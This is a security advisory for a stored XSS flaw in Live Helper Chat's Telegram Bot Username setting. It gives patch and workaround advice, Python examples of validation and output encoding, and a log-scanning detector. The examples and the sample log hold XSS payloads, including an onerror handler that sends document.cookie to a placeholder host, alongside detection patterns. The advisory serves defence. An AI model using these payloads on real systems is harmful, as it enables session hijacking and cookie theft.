CVE-2025-51396
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat v4.60 allows an attacker who can edit the Telegram Bot settings to store a script payload in the Telegram Bot Username parameter. The stored value is rendered without output encoding, so when another user views the affected configuration the script runs in that user's browser with that user's session, allowing theft of session cookies or actions performed on their behalf. Any user whose role lets them view the Telegram Bot configuration, in practice administrators, is exposed when they open it.
💻 Affected Systems
- Live Helper Chat
📦 What is this software?
Live Helper Chat by Livehelperchat
⚠️ Risk & Real-World Impact
Worst Case
An attacker steals a higher-privileged administrator's session cookie or drives that administrator's browser to change settings, gaining full administrative control of the chat system, then uses integrations and stored data to pivot to internal systems or to serve malicious content to users of the chat.
Likely Case
Session hijacking of administrators who open the Telegram settings page, credential theft through injected forms, defacement of the admin or chat interface, or redirection of administrators to attacker-controlled sites.
If Mitigated
Limited to interface disruption or minor data exposure, provided the stored value is output-encoded wherever it is rendered, session cookies are marked HttpOnly (which stops cookie theft but not actions performed within the victim's session), and a restrictive Content-Security-Policy blocks inline script.
🎯 Exploit Status
Injecting the payload requires an account that can modify the Telegram Bot settings, so the realistic scenario is an operator or lower-privileged administrator with that permission attacking higher-privileged administrators who later view the page, or an attacker who has already obtained such an account using the payload for persistence. Proof-of-concept code is publicly available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v4.61 or later
Vendor Advisory: https://github.com/LiveHelperChat/livehelperchat/pull/2228/commits/2056503ad96e04467ec9af8d827109b9b9b46223
Restart Required: No
Instructions:
1. Back up your current installation (files and database).
2. Download the latest version from the official repository.
3. Replace the affected files with the patched versions.
4. Clear any cached data.
🔧 Temporary Workarounds
Disable Telegram Bot Integration
Temporarily disable the Telegram Bot feature so that the affected setting is neither editable nor rendered.
Edit configuration to remove Telegram Bot settings or disable the module in admin panel.
Input Validation Filter
Implement server-side allowlist validation for the Telegram Bot Username field and encode the value on output.
Stripping HTML or script tags is easy to bypass (attribute breakouts, event handlers, encoded variants), so reject any value that does not match the allowed Telegram username character set, and render the stored value with htmlspecialchars($value, ENT_QUOTES, 'UTF-8') in the relevant PHP template.
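The two halves of that workaround, allowlist validation on the way in and context-aware encoding on the way out, as an added Python illustration (not the project's PHP code). The username rule is an assumption for the example: Telegram bot usernames are letters, digits and underscores, 5 to 32 characters, ending in "bot"; the accepted leading "@" and the field/attribute names are likewise assumed. `html.escape(..., quote=True)` plays the role that `htmlspecialchars($v, ENT_QUOTES, 'UTF-8')` would in PHP.

```python
import html
import re

# Assumed allowlist: letters, digits, underscore; 5-32 chars; must start with a
# letter. Adjust to the project's real constraints if they differ.
_BOT_USERNAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_]{4,31}$")


def validate_telegram_bot_username(raw: str) -> bool:
    """Return True only if `raw` looks like a Telegram bot username.

    A single leading '@' is tolerated (assumption: admins often paste '@name').
    Because the regex admits no '<', '>', quotes or spaces, no markup can pass
    validation and reach storage.
    """
    value = raw.strip()
    if value.startswith("@"):
        value = value[1:]
    if not _BOT_USERNAME_RE.fullmatch(value):
        return False
    # BotFather requires bot usernames to end in "bot" (case-insensitive).
    return value.lower().endswith("bot")


def render_setting_vulnerable(value: str) -> str:
    """The vulnerable pattern: stored value interpolated raw into an attribute.

    Hypothetical markup, not the project's template; shown only for contrast.
    """
    return f'<input type="text" name="telegram_username" value="{value}">'


def render_setting_safe(value: str) -> str:
    """Same markup with output encoding for the HTML-attribute context.

    html.escape(quote=True) encodes & < > " and ', so the value cannot close
    the attribute or open a new element.
    """
    encoded = html.escape(value, quote=True)
    return f'<input type="text" name="telegram_username" value="{encoded}">'


if __name__ == "__main__":
    payload = '"><script>alert(document.cookie)</script>'
    print(validate_telegram_bot_username("Support_helper_bot"))  # True
    print(validate_telegram_bot_username(payload))               # False
    print(render_setting_vulnerable(payload))  # attribute broken out of, live <script>
    print(render_setting_safe(payload))        # payload stays inert inside the attribute
```

Validation alone is not the fix: an older stored value, or one written through another path, still has to be encoded at render time, which is what the vendor commit addresses.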
🧯 If You Can't Patch
- Restrict administrative access to trusted IP addresses only, and limit the permission to edit Telegram Bot settings to the smallest possible set of accounts.
- Implement a web application firewall (WAF) with XSS protection rules in front of the admin interface; expect encoded or non-script payloads to get through and treat this as a speed bump, not a fix.
- Mark session cookies HttpOnly and deploy a Content-Security-Policy that disallows inline script, which blunts cookie theft and simple payloads without changing application code.
🔍 How to Verify
Check if Vulnerable:
Any installation running version 4.60, or any build that does not include the linked fix commit, should be treated as vulnerable.
Check Version:
Read the version from the admin interface, or from the version file shipped with the software if one is present.
Verify Fix Applied:
After patching, on a test instance, save a harmless marker such as "><b>xsstest</b> in the Telegram Bot Username field, reload the settings page and inspect the page source. The fix is in place if the marker appears encoded (for example as &quot;&gt;&lt;b&gt;) or the value is rejected outright; a missing pop-up alone is not proof, since the browser may simply be blocking it.
📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to Telegram Bot settings in admin logs
- HTTP requests containing script tags in the username parameter
Network Indicators:
- Unexpected outbound connections from administrators' workstations or browsers to unknown external domains shortly after visiting the admin panel (the script runs in the victim's browser, not on the chat server), particularly requests carrying cookie or session values in the URL or body
SIEM Query:
source="livehelperchat.log" AND ("telegram" AND "username" AND ("<script" OR "%3Cscript" OR "javascript:" OR "javascript%3A" OR "onerror" OR "onload"))
Form submissions arrive URL-encoded, so a query for the literal string <script> misses payloads logged as %3Cscript%3E and misses non-script vectors such as <img onerror=...>; normalise the logged value before matching where your SIEM supports it.
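A detection pass that decodes the logged parameter before matching, written for this page as an added example rather than taken from the project or any SIEM product. The log lines below are constructed, the field layout (timestamp, client IP, method, path, telegram_username=...) and the admin path are assumptions, and the example generalises the page's query to any tag, event handler or javascript: URI rather than the literal <script> string.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample log (not real Live Helper Chat output; layout is assumed).
SAMPLE_LOG = """\
2025-06-01T09:58:12Z 10.0.0.5 POST /admin/telegram/settings telegram_username=Support_helper_bot
2025-06-01T10:01:45Z 10.0.0.7 POST /admin/telegram/settings telegram_username=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
2025-06-01T10:03:02Z 10.0.0.7 POST /admin/telegram/settings telegram_username=x%22%3E%3Cimg+src%3Dx+onerror%3Dfetch(%27https%3A%2F%2Fexample.invalid%2F%3F%27%2Bdocument.cookie)%3E
2025-06-01T10:04:30Z 10.0.0.9 GET /admin/telegram/settings
2025-06-01T10:06:10Z 10.0.0.7 POST /admin/telegram/settings telegram_username=%26lt%3Bsvg+onload%3Dalert(1)%26gt%3B
2025-06-01T10:07:00Z 10.0.0.3 POST /admin/telegram/settings telegram_username=javascript%3Aalert(1)
"""

PARAM_RE = re.compile(r"telegram_username=(\S*)")

# Checked against the fully decoded, lower-cased value, in this order.
INDICATORS = [
    ("tag", re.compile(r"<\s*/?\s*[a-z]")),            # any element start, not only <script>
    ("event-handler", re.compile(r"\bon[a-z]+\s*=")),  # onerror=, onload=, ...
    ("js-uri", re.compile(r"javascript\s*:")),
]


def normalize(value: str) -> str:
    """Undo up to two layers of URL encoding, then HTML entities, then lower-case.

    Double decoding catches %2526lt%253B-style nesting; entity decoding catches
    payloads submitted already entity-encoded to slip past literal matching.
    """
    decoded = value
    for _ in range(2):
        step = unquote_plus(decoded)
        if step == decoded:
            break
        decoded = step
    return html.unescape(decoded).lower()


def scan_log(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, indicator name, decoded value) for suspicious lines."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = PARAM_RE.search(line)
        if not m:
            continue
        value = normalize(m.group(1))
        for name, pattern in INDICATORS:
            if pattern.search(value):
                hits.append((lineno, name, value))
                break
    return hits


def naive_literal_hits(text: str) -> list[int]:
    """What a literal '<script>' / 'javascript:' search over raw lines catches."""
    return [n for n, line in enumerate(text.splitlines(), start=1)
            if "<script>" in line.lower() or "javascript:" in line.lower()]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("literal match only:", naive_literal_hits(SAMPLE_LOG))
```

On the sample, the decoding scanner flags four of the five submissions while the literal search flags none, because every payload in a real form post reaches the log URL-encoded. Pair the alert with the application's own audit log of who saved the setting and from where.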